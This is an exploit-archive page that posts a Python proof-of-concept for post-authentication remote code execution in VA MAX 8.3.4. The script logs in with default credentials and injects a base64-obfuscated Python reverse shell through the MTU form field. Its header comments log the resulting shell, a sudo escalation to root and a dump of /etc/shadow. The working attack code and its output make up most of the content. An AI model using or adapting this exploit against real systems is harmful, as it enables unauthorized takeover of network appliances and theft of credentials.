exploit the possibilities

VA MAX 8.3.4 Remote Code Execution

VA MAX 8.3.4 Remote Code Execution
Posted Feb 11, 2019
Authored by Cody Sixteen

VA MAX version 8.3.4 suffers from a post-authentication remote code execution vulnerability.

tags | exploit, remote, code execution
MD5 | 2f7f205175ffba97f02f89ae90c1840a

VA MAX 8.3.4 Remote Code Execution

Change Mirror Download
root@nippur:/home/c/src/nippur# cat vamax3.py
#!/usr/bin/env python
# quick poc for postauth rce bug in va max 8.3.4
#
# more:
# https://code610.blogspot.com
#
# 10.02.2019
#

# p.s.
#
# listening on [any] 4444 ...
# 192.168.1.126: inverse host lookup failed: Unknown host
# connect to [192.168.1.160] from (UNKNOWN) [192.168.1.126] 58894
# sh: no job control in this shell
# sh-4.1$ id
# id
# uid=48(apache) gid=48(apache) groups=48(apache),10(wheel),18(dialout)
# sh-4.1$ cat /etc/shadow
# cat /etc/shadow
# cat: /etc/shadow: Permission denied
# sh-4.1$
# (...)
# sh-4.1$ sudo -l
# sudo -l
# Matching Defaults entries for apache on this host:
# syslog_goodpri=debug, env_reset,
# secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
#
# User apache may run the following commands on this host:
# (ALL) NOPASSWD: ALL
# sh-4.1$ sudo su
# sudo su
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
# head -n1 /etc/shadow
# root:$6$dNu030j/gSf.5(...)4IlAEGpzHv0:15392:0:99999:7:::
#
#
# o/

import datetime, time
import requests
from requests.auth import HTTPBasicAuth

# defines
dateTime = datetime.datetime.now()
timestamp = int(time.mktime(dateTime.timetuple()))

remote_host = 'http://192.168.1.126:9080'
our_user = 'loadbalancer'
our_passwd = 'loadbalancer'

# go
sess = requests.session()
logme = sess.post(remote_host, auth=HTTPBasicAuth(our_user, our_passwd))
logmeresp = logme.text


print '\n\tsmall poc for VA MAX 8.3.4\n'



# try to log in
if '<title>Load Balancer Administration System' in logmeresp:
print '[+] using credentials: %s : %s' % ( our_user, our_passwd )
print '[+] our timestamp: %s' % ( timestamp )

print '[+] proceed.'

getme = remote_host + '/lbadmin/config/changeip.php?action=modip&l=e&t=' + str(timestamp)
dogetme = sess.get(getme, auth=HTTPBasicAuth(our_user, our_passwd))
getmeresp = dogetme.text


payload = "h4x;echo cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9J TkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC4xLjE2MCIsNDQ0NCkpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3 MuZHVwMihzLmZpbGVubygpLDEpOyBvcy5kdXAyKHMuZmlsZW5vKCksMik7cD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk7Jwo= | base64 -d | sh;#"

#payload = "h4x;telnet 192.168.1.160 4444;#"
#payload = ';id>/tmp/id.id.id'
# print '[i] using payload:', payload

data_req = {
'eth0' : '192.168.1.126/24',
'mtu_eth0' : '1500' + payload, # >.<
'eth1' : '',
'mtu_eth1' : '1500',
'eth2' : '',
'mtu_eth2' : '1500',
'eth3' : '',
'mtu_eth3' : '1500',
'go' : 'Configure+Interfaces'
}
shLink = remote_host + '/lbadmin/config/changeip.php?action=modip&l=e&t=' + str(timestamp)
shellWe = sess.post(shLink, data=data_req, auth=HTTPBasicAuth(our_user, our_passwd))
shResp = shellWe.text

# check sudo -l now :>
print '\n\nThanks.Bye.\n'

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    21 Files
  • 2
    Apr 2nd
    35 Files
  • 3
    Apr 3rd
    21 Files
  • 4
    Apr 4th
    16 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    1 Files
  • 7
    Apr 7th
    2 Files
  • 8
    Apr 8th
    23 Files
  • 9
    Apr 9th
    19 Files
  • 10
    Apr 10th
    15 Files
  • 11
    Apr 11th
    14 Files
  • 12
    Apr 12th
    11 Files
  • 13
    Apr 13th
    2 Files
  • 14
    Apr 14th
    5 Files
  • 15
    Apr 15th
    14 Files
  • 16
    Apr 16th
    19 Files
  • 17
    Apr 17th
    19 Files
  • 18
    Apr 18th
    2 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close